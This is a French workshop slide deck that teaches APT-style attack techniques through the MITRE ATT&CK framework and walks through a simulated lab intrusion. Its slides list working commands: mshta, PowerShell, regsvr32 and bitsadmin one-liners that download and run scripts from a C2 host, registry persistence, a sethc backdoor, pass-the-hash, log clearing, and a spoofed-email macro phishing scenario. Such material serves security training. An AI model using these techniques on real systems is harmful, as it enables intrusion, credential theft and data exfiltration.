SlideShare une entreprise Scribd logo
29 SEPT 2018
ABENE Bertin,
Spécialiste en Cybersécurité
Responsable Sécurité Système d’Information - *
Codeur | Bloggeur |Formateur
@thebenygreen
@237hackers @eyesopsec
http://gacksecurity.blogspot.com
Trainer
Auteur de Beefstrike
2012 - 2014 2015 2016
#237HackersWorkshop
Session 01 : Cyberattaques avancées type APT
Beefstrike utilise CORTANA, un projet né du programme Cyber Fast Track DARPA du Département de la Défense des États-Unis
https://opencatalog.darpa.mil/CFT.html
https://github.com/benyG/Beefstrike/
>whoami
2
Avertissement !
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Au cours de cet atelier, les participants apprendront les
méthodes utilisées dans le cybercrime et pourrons même en
reproduire avec succès. Plus précisément certaines des
attaques répertoriées dans le Framework MITRE ATT&CK.
Le but de cet atelier est de permettre aux participants de mieux
défendre les systèmes placés sous leur responsabilité ou ceux
de leurs clients. De participer de ce fait grâce à leur maîtrise
des risques, à la construction d’un cyber espace plus sûre.
Les participants s’engagent à n’utiliser les informations
communiquées dans cet atelier que dans un cadre strictement
légale et à des fins conformes à l’éthique.
La responsabilité du formateur ne sera en aucun cas engagée si
certains participants venaient à déroger à cette clause ayant
validé leur participation.
3
PLAN
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
1. Introduction
2. Cyberattaque, Quesaco ?
3. Cyberattaques ciblées
4. Cyberattaques avancées (APT)
5. Référencement des APT
6. MITRE ATT&CK Framework
7. Schémas tactique standard
8. Exploration des techniques APT
9. ATELIER PRATIQUE :
Simulation d’une attaque type APT
10. Protection contre les cyberattaques APT
11. Conclusion
Niveau de complexité
4
Cyberattaque, Quesaco ?
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Attaque active : acte (malveillant) modifiant
ou altérant les ressources ciblées par l’attaque
(atteinte à l’intégrité, à la disponibilité et à la
confidentialité des données) .
 Loi du 21/12/2010 relative à la cybersécurité et à la
cybercriminalité au Cameroun
18 million de nouveau malware en 2016 soit 200 000 par jour
 Panda Labs
4000 Attaques de Ransomware par jour
 Computer Crime & Intellectual Property Section (CCIPS)
Motivations des cyberattaques - Juin 2018
-> https://www.hackmageddon.com/2018/07/23/june-2018-cyber-attacks-statistics/
QUELQUES CHIFFRES
5
Cyberattaque ciblée
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Une cyberattaque peut générer une crise majeure pouvant
remettre en cause la survie même de l’entreprise.
Principales conséquences :
 Financières
 Juridiques
 Réputationnelles
 Humaines
Cyberattaque, Quesaco ?
Les impacts
https://www.lamontagne.fr/clermont-ferrand/economie/commerce-artisanat/2017/09/22/victime-d-un-
piratage-informatique-la-societe-clermont-pieces-va-fermer-boutique_12561803.html
6
National Cyber Security Alliance révèle que:
+60% des PME attaque ciblée cessent leurs activités après 06 mois.
Cyberattaque, Quesaco ?
Les 4 constituantes d’une cyberattaque
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Attaquants Cibles Motivations Techniques
 Loup solitaire
 Activistes
 Organisation
 Groupes
 Terroristes
 Etats
 Entreprises
 individu
 Activistes
 Organisation
 Groupes
 Aléatoires
 Terroristes
 Etats
 Entreprises
 Financière
 Destruction
 Espionnage
 Vol des
données
 Réputation
 Basiques
 Professionnelles
 Avancées
Loup solitaire  Aléatoires  Financière  Basiques
Groupe  Aléatoires  Réputation  Basiques
7
Cyberattaque ciblée
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Attaque Ciblées / Targeted attack
Cyberattaque ayant la particularité de ne pas viser de cible aléatoirement. Au
contraire, elle vise une cible précisément sélectionnées pour des raisons en relation
avec les objectifs de l’attaque
Phase clé de sélection  RECONNAISSANCE
Activistes  Etats  Réputation  Basiques
Entreprises  Entreprises  Vol des données  Professionnelles
8
Cyberattaque ciblée
Schémas tactique des cyberattaques ciblées
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Recon
Weaponize
Delivery
Exploitation
Installation
Command
& Control
Actions
Cyber Kill Chain
Lockheed Martin
Cybersecurity kill chain is a framework developed by Lockheed Martin for identification and
prevention of cyber intrusions activity. As attacks may occur in stages, you as defender can
put optics and controls to detect or disrupt the entire process.9
Cyberattaque avancée ( type APT )
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Advanced Persistent Threat
Menace Persistante Avancée
Menace de par son
caractère dangereux
pour la cible
Dans toutes les attaques APT.
L’objectifs est de maintenir une
présence furtive long termes
au cœur du système cible.
Les outils et techniques
utilisées trahissent la
bonne organisation, les
compétences élevées des
attaquants et les moyens
financiers conséquents
mis à disposition pour
l’execution de l’attaque.
L'APT utilise un ensemble évolutif de tactiques, de techniques et
de procédures (TTP) pour établir et maintenir une présence dans
l'infrastructure informatique de la cible et exploiter ce potentiel
pour exfiltrer d'importants volumes d'informations sensibles,
corrompre les informations critiques ou dégrader les capacités
10
Cyberattaque avancée ( type APT )
Particularités des constituantes
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Attaquants Cibles Motivations Techniques
 Organisations
 Groupes
 Etats
 Entreprises
 Organisations
 Groupes
 Etats
 Entreprises
 Financières
 Espionnage
 Vol de
données
 Avancées
Etats  Etats  Espionnage/Vol  Avancées
Groupes  Entreprises  Financières  Avancées
Etats  Organisations  Espionnage/Vol  Avancées
11
Référencement des APT
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
https://www.fireeye.com/current-threats/apt-groups.html
12
MITRE ATT&CK Framework
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
MITRE a mis au point (ATT&CK ™), une base de connaissances et
un modèle pour le comportement des cyber-adversaires, reflétant
les différentes phases du cycle de vie de l’adversaire et les plates-
formes qu’ils sont censés cibler.
Technique Description
Persistence
Privilege Escalation
Defense Evasion
Credential Access
Discovery
Lateral Movement
Execution
Collection
Exfiltration
Command and Control
(C2)
Techniques de présence persistante sur un système compromis
Techniques permettant à l'adversaire d'obtenir un niveau plus élevé d'autorisations
Techniques que les adversaires utilisent pour échapper à la détection ou l’éviter
Techniques permettant d'accéder ou de contrôler les informations d'identification des
systèmes, du domaine ou des services
Techniques permettant à l'adversaire d'acquérir des connaissances sur le système et le
réseau interne
Techniques permettant à un adversaire d'accéder et de contrôler des systèmes distants
au sein du réseau cible
Techniques permettant l'exécution de code contrôlé par l'adversaire sur un système
local ou distant
Techniques utilisées pour identifier et collecter des informations
Techniques qui aident l'adversaire à exfiltrer des fichiers et les données d'un réseau cible
Techniques représentant la manière dont les adversaires communiquent avec les
systèmes sous leur contrôle au sein d'un réseau cible
https://attack.mitre.org/wiki/Main_Page
13
APT: Schémas tactique standard
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
14
Build social
Engineering
Attack scenario
Installation de l’infra C2
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Modèle d’infra C2
Segmenter les composantes fonctionnelles de
l’infrastructure en couche offre la flexibilité et la
résilience face aux actions préventives
Empêche l'identification du cœur de l’infra et sème la confusion
Redirection Layer
Utilisé essentiellement pour la phase Delivery
Phishing Layer
Héberge la charge offensive qui attaquera les cibles
Payload Delivery Layer
Contrôle des opérations
Control Layer
victime
Attaquants 15
Installation de l’infra C2
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Communication: Channels et Profiles
 Les channels sont les protocoles+services utilisés pour le trafic vers le
C2. En générale le choix vise à éveiller le moins de suspicion
(exple: https+twitter)
 Les profiles C2 permettent à l’attaquant d’imiter un channel, et ainsi
déterminer comment le trafic vers le C2 sera vu sur le réseau.
Dès lors on a 02 options avec les profiles:
1. Faire passer le trafic pour légitime en utilisant l’empreinte réseau des applications metier
utilisées sur le réseau cible (exemple: Exchange Online, Sage Online, …)  Red Teaming
2. Simuler l’empreinte réseau d’une menace spécifiques connues pour évaluer la réponse de
nos défense  Adversary Emulation/Simulation
16
Trafic généré par un sample du bot Zeus
https://digital-forensics.sans.org/blog/2014/03/31/the-
importance-of-command-and-control-analysis-for-
incident-response
Recon
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
OSINT SCAN
Scan des ports
Enumération des
services
Scan de vulnérabilité
Sources OSINT
• Moteurs de
recherche
• Réseaux sociaux
• Sites d’annonces
• …etc
• Nom des cibles clé
• Email
• Téléphone
• Intérêts
• etc
• IP
• Services
• Applications
• Vulnérabilités
• Etc
C’est de loin l’étape la plus importante
Non-intrusif
Intrusif
Utilisateurs, Organisations, …
data
Big data
17
Tactique: Weaponize
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
 Binder : Ajouter un fichier exe dans un fichier exe
 Fichier Office piégé avec macro
 Watering hole
 Exploits embarqués (exe, page web, …)
 etc
18
Techniques
Tactique: Execution
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Techniques
- CMSTP: executer du code via les fichiers INF [T1191]
cmstp.exe C:eo.inf /au
- DDE : usage de la fonctionnalité Dynamic Data Execution d’Office [T1173]
Insert-> Quick Parts-> Field -> {DDEAUTO c:windowssystem32cmd.exe "/k calc.exe"}
- MSHTA[T1170] :
mshta.exe javascript:a=(GetObject("script:http://192.168.43.203:5000/mshta/eo.sct")).Exec();close();
- POWERSHELL [T1086] :
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://192.168.43.203:5000/psh/eo.ps1’)
- REGSVR32 [T1117] : regsvr32.exe /s /u /i:http://192.168.43.203:5000/cmstp/eo.sct scrobj.dll
19
Tactique: Execution
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Techniques
- RUNDLL32 [T1085] :
• Rundll32.exe javascript:"..mshtml,RunHTMLApplication
";document.write();GetObject("script:http://192.168.43.203:5000/rundll32/eo.sct").Exec();“
• Rundll32 SHELL32.DLL,ShellExec_RunDLL "calc"
- SCHTASKS [T1035] : SCHTASKS /Create /SC ONCE /TN eotask /TR calc /ST 12:54
- WMI [T1047]: WMIC process call create "cmd.exe /c calc“
WMIC /node:ComputerName process call create “cmd.exe /c calc.exe”
wmic os get /format:"http://192.168.43.203:5000/xsl/eo.xsl"
- WINRM : winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}
- WSCRIPT 20
Tactique: Persistence
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Techniques
- BROWSER EXTENSION [T1191] : chrome://extensions -> « Load unpacked extension »
- BITSADMIN: Background Intelligent Transfer Service [T1197]
bitsadmin.exe /transfer /Download /priority Foreground http://192.168.43.203:5000/psh/eo.ps1 eo.bat
- REGISTRY [T1060] :
REG ADD HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun /V EO /t REG_SZ /F /D calc
- STARTUP FOLDER [T1060] : C:ProgramDataMicrosoftWindowsStart
MenuProgramsStartUp
- LOGON SCRIPT[T1117] : REG ADD HKCUEnvironment /v UserInitMprLogonScript /t
REG_MULTI_SZ /d calc
- WMI Event Subscription [T1084]
- SCHTASKS [T1035] : SCHTASKS /Create /SC ONCE /TN eotask /TR calc /ST 12:54 21
Tactique: Privileges escalation (privesc)
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Techniques
- EXPLOIT LOCAUX :
MS10-015 : User Mode to Ring (KiTrap0D), MS10-092 : Task Scheduler
MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
MS13-081 : TrackPopupMenuEx Win32k NULL Page
MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
MS15-051 : ClientCopyImage Win32k, MS15-078 : Font Driver Buffer Overflow
MS16-016 : 'mrxdav.sys' WebDAV, MS16-032 : Secondary Logon Handle
- EVENTVIEWER UAC BYPASS
- SETHC BINARY SWAPPING [T1015]
takeown.exe C:Windowssystem32sethc.exe & del C:Windowssystem32sethc.exe &
copy C:Windowssystem32cmd.exe C:Windowssystem32sethc.exe
22
Tactique: Lateral Movement
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Techniques
- PSEXEC [T1002] :
psexec /accepteula 192.168.10.1 -s cmd.exe
(Run cmd.exe on the remote box as the SYSTEM user account)
psexec /accepteula ip -u domainuser -p lm:ntlm cmd.exe /c dir c:Progra~1
(Run cmd.exe on the remote system using the lm:ntlm password hash - aka pass the hash)
- MIMIKATZ [T1191] : mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
- WMI [T1191] :
23
Tactique: Credentials access
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Techniques
- CREDENTIALS DUMPING [T1003] : Extraction des Hash des mots de passe
Extraction des mots de passe en clair
- KEYLOGGER: Enregistrement des frappes clavier
- PHISHING: incitation frauduleuse à transmettre des informations
24
Tactique: Defense Evasion
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Techniques
- Obfuscation [T1027] : Import-Module ./Invoke-Obfuscator.psd1;
https://javascriptobfuscator.com/Javascript-Obfuscator.aspx
- Encryption: aes, blowfish, rsa
- Encoding [T1027] exemple: ascii, unicode, url encoding, base64
https://javascriptobfuscator.com/Javascript-Obfuscator.aspx
- Bypass Application whitelisting: Regsvr32, Rundll32, Installutil, Mshta, CMSTP…
- CODE SIGNING[T1116]
- DISABLING SECURITY TOOLS [T1089]: wevtutil el | Foreach-Object {wevtutil cl $_}
- TIMESTOMP [T1099] 25
Tactique: Discovery
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
26
• Users account Discovery
• File and Directory Discovery
• Remote System Discovery
• Services Discovery
• Software discovery
• Configurations Discovery
• etc
Tactique: Compression & Exfiltration
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Techniques
- ZIP
- RAR
- etc
Techniques
- Exfiltration via service HTTP
- Exfiltration via serveur FTP
- Exfiltration via des API de service Web
(Github, Pastebin, …etc)
27
Exfiltration
Compression
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Scenario du LAB
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
L’entreprise EMIZOPLAYA CORP exerce ses activités dans le domaine de la logistique
et elle se porte plutôt bien depuis plus de 05 ans. Son chiffre d’affaire ne cesse de
croître.
EMIZOPLAYA CORP s’est récemment vu attribuer un important marché n7030 d’une
valeur de 530 million.
29Threat actor : APT98
Vous allez jouer le rôle de cette entité
Pour des motivations X et Y une entité a été contactée pour établir une
présence durable au sein du système d’information de l’entreprise
EMIZOPLAYA CORP à fin d’obtenir des données liés à ses succès et à
l’attribution du marché n7030
Configuration du Réseau du LAB
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
30
Serveur
- DC
- Files
Antoine ZOPLAYA (DG)
Nom PC: cli02
IP: 192.168.10.22
Jessica MAMU (CP)
Nom PC: cli01
IP: 192.168.10.21
C2 infra - APT98
autres
APT98 Team
(Internet)
Céline FOTSO (Sysadmin)
Nom PC: DC01
IP: 192.168.10.1
Domain: emizoplaya.com
192.168.10.203
192.168.43.203
Internet virtuel
Wifi: Eolab
192.168.10.10
NAT
Naviguons pour tester
les accès aux fichiers
Choix de l’outil du LAB
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
• Cobalt Strike
• Caldera
• Atomic Redteam
• Invoke-Adversary
• RedTeam Automation
• Empire
• etc
31
Empire PowerShell
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
 Les Listeners sont les canaux qui reçoivent des connexions de notre machine cible.
 Les stagers sont des charges « explosives » utilisées pour créer une connexion avec le C2
 Les agents sont les connexions créé avec les machines attaquées avec succès.
 Les modules sont des commandes spécifiques exécutable sur une machine victime
Listeners Stagers
Agents
32
Modules
Début
victime
Results
Setup C2
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
GET request URI | User Agent | Header #1Format de profile :
33
Changer de profile
Supprimer la DB empire.db, editer là et redémarrer empire  exemple profile BING search :
set DefaultProfile
/owa/mail/inbox.srf,/owa/mail/drafts.srf,/owa/mail/archive.srf|Mozilla/5.0
(Windows NT 6.1; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko|Accept:*/*
set ServerVersion "Microsoft-IIS/8.5«
page = """<!DOCTYPE html><html > … </html> """
Modifier la réponse HTTP par défaut en éditant le fichier : lib/common/http.py
Scenario
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
EXECUTION DE LA PHASE RECON:
Site web
linkedin
Site annonce
twitter intérêt
contact
Social
engineering
scenario
34
Nom CP
Cpte twitter Rolex
Nom CP Contact CP
Résultats
Jessica MAMU BEKOSSI
Employé à EMIZOPLAYA
Chef de Projet à EMIZOPLAYA CORP
Diplômé de l’ESSEC, Certifié PMP
Passionnée de ROLEX
Twitter: https://twitter.com/jessmak18
Contact: jessmamu02@yahoo.fr
Scenario
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
WEAPONIZING PHASE :
Un fichier excel avec une macro malveillante
qui établi la connection initiale avec le C2
35
Construction du scénario d’ ingénierie sociale
Jessisa MAMU BEKOSSI = Cible
La maison ROLEX contacte JESSICA pour l’informer de sa sélection pour participer
gratuitement au lancement du programme « Rolex Elite Fans »
Qui a pour but de permettre aux Fans de la marque de montre luxe de participer au
choix des montres qui apparaitront sur le catalogue de l’année 2019.
Il est précisé qu’aucune information personnelle ne sera demandée
aux participants à ce programme
DELIVERY PHASE :
Service de email spoofing : https://emkei.cz/ Bill
Mosse, un responsable de chez ROLEX envoi le
fichier
bill.mosse@rolex.com
Scenario
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
DEFENSE EVASION PHASE:
- Obfuscation du code
- Modification du profile C2
- Bypass Firewall usage port 80
36
Techniques
Résultats
On observera aussi par la suite
Scenario
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
DISCOVERY PHASE:
On veut connaître:
- Nom machine et Compte utilisée
- Les machines en présence
- Les utilisateurs
- Les partages
- Les services
- Les contrôleurs de domaine
37
Hostname + Whoami
Aprscan
Invoke-DCSync
Share_finder + Get_ChildItem
Portscan
Get_domain_controller
Commandes/Techniques
Résultats
Session: jmamu - Session non privilégiée
Machines présentes: 192.168.10.21, 22, 1
Domaine: emizoplaya.com
DC: dc01.emizoplaya.com
Utilisateurs: jmamu, cfotso, azoplaya, mmbondo, pouedraogo, …
Partages: 192.168.10.1Business
Scenario
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
PRIVILEGES ESCALATION PHASE:
- Check admin state
- bypassUAC_eventviewer
 Nouvel agent:
- Re-check admin state
- Whoami
- Rename new agent
38
Commandes/Techniques
Résultats
Nouvelle session: jmamu - LOCAL PRIVILEGIEE
Scenario
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
PERSISTENCE PHASE:
- Registry method (application)
- WMI method (juste un coup d’œil)
39
Techniques
Résultats
Après redémarrage, team APT98 conserve l’accès à la cli01, compte non privilégié
Mot de passe en claire + HASH pour jmamu et cfotso
CREDENTIAL ACCESS PHASE:
- Logonpasswords
Commandes
Scenario
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
LATERAL MOVEMENT PHASE:
- InvokeWMI (HASH: copier-coller cfotso , CIBLE: 192.168.10.22)
 Nouvel agent:
- Hostname
- rename agent
- Check admin state
- Persistence: registry
- Get_loggedon
- logonpasswords
40
TechniquesCommandes
Résultats
Prise de contrôle de Nouveaux postes: cli02, dc01
Session locale PRIVILEGIEE
Installation de la persistence sur cli02 et dc01
Obtention des mots de passe en clair + HASH du compte du DG: azoplaya
Répétion sur dc01.emizoplaya.com
Etat d’avancement
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
41
Serveur
- DC
- Files
Antoine ZOPLAYA (DG)
Nom PC: cli02
IP: 192.168.10.22
Jessica MAMU (CP)
Nom PC: cli01
IP: 192.168.10.21
C2 infra - APT98
autres
APT98 Team
(Internet)
Céline FOTSO (Sysadmin)
Nom PC: DC01
IP: 192.168.10.1
Domain: emizoplaya.com
192.168.10.203
192.168.43.203
Internet virtuel
Wifi: Eolab
192.168.10.10
NAT
Scenario
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
COLLECTION PHASE:
Commande
- Get-ChildItem
Résultats
Le dossier projet a été identifié comme dossier à forte valeur sensible.
Ce dossier a été compressé et exfiltré vers le C2
COMPRESSION PHASE:
Techniques
- Zip Folder
EXFILTTRATION PHASE:
Techniques
- File Upload via HTTP
1 Mois plus tard Antoine Zoplaya parti en congé, effectue son retour et réouvre sa session
43
Hashtag #237infosec
THANK YOU !

Contenu connexe

Tendances

Gestion des vulnérabilités dans l'IoT
Gestion des vulnérabilités dans l'IoTGestion des vulnérabilités dans l'IoT
Gestion des vulnérabilités dans l'IoT
Maxime ALAY-EDDINE
 
Alphorm.com Formation Analyse de Malware 1/2 : Le guide complet
Alphorm.com Formation Analyse de Malware 1/2 : Le guide completAlphorm.com Formation Analyse de Malware 1/2 : Le guide complet
Alphorm.com Formation Analyse de Malware 1/2 : Le guide complet
Alphorm
 
Sensibilisation sur la cybersécurité
Sensibilisation sur la cybersécuritéSensibilisation sur la cybersécurité
Sensibilisation sur la cybersécurité
OUSMANESoumailaYaye
 
La sécurité informatique
La sécurité informatiqueLa sécurité informatique
La sécurité informatique
Saber Ferjani
 
INITIATION A LA SÉCURITÉ INFORMATIQUE.pptx
INITIATION A LA SÉCURITÉ INFORMATIQUE.pptxINITIATION A LA SÉCURITÉ INFORMATIQUE.pptx
INITIATION A LA SÉCURITÉ INFORMATIQUE.pptx
Leandre Cof's Yeboue
 
Déclaration d'applicabilité (DdA) - ISO27002:2013
Déclaration d'applicabilité (DdA) - ISO27002:2013Déclaration d'applicabilité (DdA) - ISO27002:2013
Déclaration d'applicabilité (DdA) - ISO27002:2013
Bachir Benyammi
 
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...
Alphorm
 
La sécurité informatique
La sécurité informatiqueLa sécurité informatique
La sécurité informatique
Cheick Ahmed Camara
 
Sécuriter informatiques
Sécuriter informatiquesSécuriter informatiques
Sécuriter informatiques
Amadou Dary diallo
 
Mise en place d'une Plateforme de Supervision et de Détection d'Intrusion Sys...
Mise en place d'une Plateforme de Supervision et de Détection d'Intrusion Sys...Mise en place d'une Plateforme de Supervision et de Détection d'Intrusion Sys...
Mise en place d'une Plateforme de Supervision et de Détection d'Intrusion Sys...
Alaaeddine Tlich
 
Mise en place d’une solution de tests de sécurité pour les passerelles réside...
Mise en place d’une solution de tests de sécurité pour les passerelles réside...Mise en place d’une solution de tests de sécurité pour les passerelles réside...
Mise en place d’une solution de tests de sécurité pour les passerelles réside...
Salmen HITANA
 
La Sécurité informatiques
La Sécurité informatiquesLa Sécurité informatiques
La Sécurité informatiques
Nouriddin BEN ZEKRI
 
Securite informatique
Securite informatiqueSecurite informatique
Securite informatique
Souhaib El
 
Support du cours : Programmation Web 2
Support du cours : Programmation Web 2Support du cours : Programmation Web 2
Support du cours : Programmation Web 2
Faycel Chaoua
 
Deployer son propre SOC !
Deployer son propre SOC ! Deployer son propre SOC !
Deployer son propre SOC !
SecludIT
 
Rapport atelier Web App Security 2015
Rapport atelier Web App Security 2015Rapport atelier Web App Security 2015
Rapport atelier Web App Security 2015
Hamza Ben Marzouk
 
La sécurité informatique expliquée aux salariés
La sécurité informatique expliquée aux salariésLa sécurité informatique expliquée aux salariés
La sécurité informatique expliquée aux salariés
NRC
 
Sécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défenseSécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défense
Antonio Fontes
 
Présentation audits de sécurité
Présentation   audits de sécuritéPrésentation   audits de sécurité
Présentation audits de sécurité
Harvey Francois
 
Mehari 2010-manuel-de-reference-2-14
Mehari 2010-manuel-de-reference-2-14Mehari 2010-manuel-de-reference-2-14
Mehari 2010-manuel-de-reference-2-14
imen1989
 

Tendances (20)

Gestion des vulnérabilités dans l'IoT
Gestion des vulnérabilités dans l'IoTGestion des vulnérabilités dans l'IoT
Gestion des vulnérabilités dans l'IoT
 
Alphorm.com Formation Analyse de Malware 1/2 : Le guide complet
Alphorm.com Formation Analyse de Malware 1/2 : Le guide completAlphorm.com Formation Analyse de Malware 1/2 : Le guide complet
Alphorm.com Formation Analyse de Malware 1/2 : Le guide complet
 
Sensibilisation sur la cybersécurité
Sensibilisation sur la cybersécuritéSensibilisation sur la cybersécurité
Sensibilisation sur la cybersécurité
 
La sécurité informatique
La sécurité informatiqueLa sécurité informatique
La sécurité informatique
 
INITIATION A LA SÉCURITÉ INFORMATIQUE.pptx
INITIATION A LA SÉCURITÉ INFORMATIQUE.pptxINITIATION A LA SÉCURITÉ INFORMATIQUE.pptx
INITIATION A LA SÉCURITÉ INFORMATIQUE.pptx
 
Déclaration d'applicabilité (DdA) - ISO27002:2013
Déclaration d'applicabilité (DdA) - ISO27002:2013Déclaration d'applicabilité (DdA) - ISO27002:2013
Déclaration d'applicabilité (DdA) - ISO27002:2013
 
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...
 
La sécurité informatique
La sécurité informatiqueLa sécurité informatique
La sécurité informatique
 
Sécuriter informatiques
Sécuriter informatiquesSécuriter informatiques
Sécuriter informatiques
 
Mise en place d'une Plateforme de Supervision et de Détection d'Intrusion Sys...
Mise en place d'une Plateforme de Supervision et de Détection d'Intrusion Sys...Mise en place d'une Plateforme de Supervision et de Détection d'Intrusion Sys...
Mise en place d'une Plateforme de Supervision et de Détection d'Intrusion Sys...
 
Mise en place d’une solution de tests de sécurité pour les passerelles réside...
Mise en place d’une solution de tests de sécurité pour les passerelles réside...Mise en place d’une solution de tests de sécurité pour les passerelles réside...
Mise en place d’une solution de tests de sécurité pour les passerelles réside...
 
La Sécurité informatiques
La Sécurité informatiquesLa Sécurité informatiques
La Sécurité informatiques
 
Securite informatique
Securite informatiqueSecurite informatique
Securite informatique
 
Support du cours : Programmation Web 2
Support du cours : Programmation Web 2Support du cours : Programmation Web 2
Support du cours : Programmation Web 2
 
Deployer son propre SOC !
Deployer son propre SOC ! Deployer son propre SOC !
Deployer son propre SOC !
 
Rapport atelier Web App Security 2015
Rapport atelier Web App Security 2015Rapport atelier Web App Security 2015
Rapport atelier Web App Security 2015
 
La sécurité informatique expliquée aux salariés
La sécurité informatique expliquée aux salariésLa sécurité informatique expliquée aux salariés
La sécurité informatique expliquée aux salariés
 
Sécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défenseSécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défense
 
Présentation audits de sécurité
Présentation   audits de sécuritéPrésentation   audits de sécurité
Présentation audits de sécurité
 
Mehari 2010-manuel-de-reference-2-14
Mehari 2010-manuel-de-reference-2-14Mehari 2010-manuel-de-reference-2-14
Mehari 2010-manuel-de-reference-2-14
 

Similaire à Cyber attaques APT avec le framework MITRE ATT&CK

On a volé les clefs de mon SI !
On a volé les clefs de mon SI !On a volé les clefs de mon SI !
On a volé les clefs de mon SI !
Microsoft Technet France
 
Formation Securite Informatique AKAOMA Consulting Certification Securite Info...
Formation Securite Informatique AKAOMA Consulting Certification Securite Info...Formation Securite Informatique AKAOMA Consulting Certification Securite Info...
Formation Securite Informatique AKAOMA Consulting Certification Securite Info...
Christophe Pekar
 
Cyber threat intelligence
Cyber threat intelligenceCyber threat intelligence
Cyber threat intelligence
Mondher Smii
 
Copy of PARTIE-1 Introduction à la cyber sécurité.pdf
Copy of PARTIE-1 Introduction à la cyber sécurité.pdfCopy of PARTIE-1 Introduction à la cyber sécurité.pdf
Copy of PARTIE-1 Introduction à la cyber sécurité.pdf
simogamer3
 
Barcamp presentation Cybersecurite by saphia
Barcamp presentation Cybersecurite by saphiaBarcamp presentation Cybersecurite by saphia
Barcamp presentation Cybersecurite by saphia
BarcampCameroon
 
Snort
SnortSnort
Snort
TchadowNet
 
070219 Webinar Sensibilisation Sécurité Logiciel Everteam
070219 Webinar Sensibilisation Sécurité Logiciel Everteam070219 Webinar Sensibilisation Sécurité Logiciel Everteam
070219 Webinar Sensibilisation Sécurité Logiciel Everteam
Everteam
 
siris1.pdf
siris1.pdfsiris1.pdf
siris1.pdf
ssuserdd27481
 
Jeudi de l AFAI - Evolutions des menaces et adaptation des SOC
Jeudi de l AFAI - Evolutions des menaces et adaptation des SOCJeudi de l AFAI - Evolutions des menaces et adaptation des SOC
Jeudi de l AFAI - Evolutions des menaces et adaptation des SOC
Antoine Vigneron
 
Resume-theorique-M209-V1-version-provisoire-0909_2.pdf
Resume-theorique-M209-V1-version-provisoire-0909_2.pdfResume-theorique-M209-V1-version-provisoire-0909_2.pdf
Resume-theorique-M209-V1-version-provisoire-0909_2.pdf
FootballLovers9
 
Sécurisation d'un site internet
Sécurisation d'un site internetSécurisation d'un site internet
Sécurisation d'un site internet
waggaland
 
Baromètre BlackNoise 2022.pdf
Baromètre BlackNoise 2022.pdfBaromètre BlackNoise 2022.pdf
Baromètre BlackNoise 2022.pdf
ssuser384b72
 
Cours sécurité 2_asr
Cours sécurité 2_asrCours sécurité 2_asr
Cours sécurité 2_asr
TECOS
 
Bq100 g formation-ibm-security-qradar-siem-7-1-foundations
Bq100 g formation-ibm-security-qradar-siem-7-1-foundationsBq100 g formation-ibm-security-qradar-siem-7-1-foundations
Bq100 g formation-ibm-security-qradar-siem-7-1-foundations
CERTyou Formation
 
Starc by Exaprobe
Starc by ExaprobeStarc by Exaprobe
Starc by Exaprobe
Exaprobe
 
Rapport Threat Intelligence Check Point du 23 mai 2016
